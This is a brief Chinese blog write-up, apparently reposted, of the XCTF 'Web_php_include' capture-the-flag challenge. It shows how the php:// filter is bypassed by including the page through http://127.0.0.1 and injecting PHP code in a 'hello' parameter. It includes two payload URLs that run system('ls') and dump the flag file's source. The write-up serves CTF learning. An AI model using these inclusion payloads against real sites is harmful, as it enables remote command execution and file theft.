首页 博客列表 精选博客 每日焦点 关于我
XCTF web Web_php_include (php://过滤)
发布日期:2021-05-07 06:19:21 浏览次数:18 分类:精选文章

本文共 276 字,大约阅读时间需要 1 分钟。

题目代码

用php://来引入文件流,然后include显示文件信息

php://被过滤,但是有个hello

因为这个页面就是默认页面,而且默认页面也可以用index.php来访问

可以把page转到当前页面,并且配合hello来执行一条php函数的语句获取信息就可以了。

?page=http://127.0.0.1/index.php/?hello=<?system("ls");?>

?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>

上一篇:[渗透笔记][模板注入]python模板注入
下一篇:XCTF web php_rce (thinkphp)

发表评论

最新留言

路过按个爪印,很不错,赞一个!
[***.219.124.196]2025年04月22日 12时58分25秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

Python svm 支持向量机 2019-03-15
OpenStack 最小化安装配置(一):物理机网桥配置 2019-03-15
PS快速美白照片 2019-03-15
ubuntu 16.04 镜像下载 2019-03-15
CUDA9.1、cuDNN7在Ubuntu16.04上的安装 2019-03-15
解决“预编译器错误:代码使用了scss/sass语言,但未安装相应编译器,请在菜单工具-插件安装里安装相应编译插件” 2019-03-15
微信小程序云开发:怎么删除云函数?已解决 2019-03-15
解决微信小程序项目导入的问题:app.json 未找到、 __wxConfig is not defined 2019-03-15
什么是句柄(经典) 2019-03-15
非迅捷|PDF、Word、PPT、Excel、图片等互相在线转换:免费、简单、快速、零错误、无套路 2019-03-15
第一次被黑 2019-03-15
PyCharm配置anaconda环境 2019-03-15
修改linux 系统自带日志系统systemd-journald && 参数 2019-03-15
Redis工具类 2019-03-15
SpringBoot与缓存(JSR-107、Spring缓存抽象) 2019-03-15
ERROR 总结 2019-03-15
C语言—— 符号函数 2019-03-15
钞票最优解 2019-03-15
查找最小值栈的O(1) 2019-03-15
淘宝天猫双十一养猫组队怎么踢人 2019-03-15
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 462624703 位访客
访问时间: 2025-05-10 04:20:02 访问IP: 3.134.104.224     Copyright © 2020 - 2025 css8.cn 京ICP备2021015314号-1 手机版